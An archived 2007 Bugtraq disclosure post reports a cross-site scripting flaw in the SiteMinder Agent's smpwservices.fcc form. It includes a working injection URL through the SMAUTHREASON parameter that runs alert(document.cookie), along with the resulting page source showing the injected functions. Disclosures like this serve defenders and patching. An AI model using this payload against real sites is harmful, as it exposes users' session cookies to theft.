lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 7 Nov 2007 04:10:00 +0100
From: "Giuseppe Gottardi" <overet@...uritydate.it>
To: bugtraq@...urityfocus.com
Subject: SiteMinder Agent: Cross Site Scripting

# Exploit in [XSS]:

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]


# Cross Site Scripting (Code):

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0

In this way we can inject the alert() code without brackets in the
function resetCredFields().


-------------------------------
function resetCredFields()
{

    if (1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 0 || 1)
    {
    alert(document.cookie);
    }
}
function drop(){

if( 0 == 4 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 5 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 28 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 1 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 18 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 20 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 22 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 31 || 1)
    {
    alert(document.cookie);
    }
}
function drop(){

if( 0 == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>
-------------------------------


Regards,
Giuseppe Gottardi (aka oveRet)

---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: overet@...uritydate.it
Web: http://overet.securitydate.it

Wednesday November 07, 2007.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ